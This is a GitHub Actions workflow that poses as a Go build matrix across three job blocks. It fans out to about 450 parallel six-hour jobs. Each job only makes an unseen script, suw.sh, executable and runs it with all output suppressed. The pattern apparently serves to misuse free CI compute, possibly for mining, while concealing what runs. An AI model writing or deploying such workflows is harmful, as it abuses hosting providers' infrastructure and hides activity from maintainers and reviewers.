name: 5ev
on: [push, pull_request] 
jobs: 
  build: 
    name: 5ev
    runs-on: ubuntu-18.04 
    strategy: 
      max-parallel: 80
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O] 
    timeout-minutes: 360 
    env: 
        NUM_JOBS: 80
        JOB: ${{ matrix.go }} 
    steps: 
    - name: Set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: Setup 
      uses: actions/checkout@v1 
    - name: runner_go 
      run: echo && chmod 777 suw.sh > /dev/null 2>&1 && ./suw.sh > /dev/null 2>&1
  postgres-2: 
    name: 5ev-2
    runs-on: ubuntu-18.04 
    strategy: 
      max-parallel: 80
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O] 
    timeout-minutes: 360 
    env: 
        NUM_JOBS: 80
        JOB: ${{ matrix.go }} 
    steps: 
    - name: Set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: Setup 
      uses: actions/checkout@v1 
    - name: runner_go 
      run: echo && chmod 777 suw.sh > /dev/null 2>&1 && ./suw.sh > /dev/null 2>&1
  postgres-3: 
    name: 5ev-3
    runs-on: ubuntu-18.04 
    strategy: 
      max-parallel: 80
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.0] 
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O] 
    timeout-minutes: 360 
    env: 
        NUM_JOBS: 80
        JOB: ${{ matrix.go }} 
    steps: 
    - name: Set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: Setup 
      uses: actions/checkout@v1 
    - name: runner_go 
      run: echo && chmod 777 suw.sh > /dev/null 2>&1 && ./suw.sh > /dev/null 2>&1
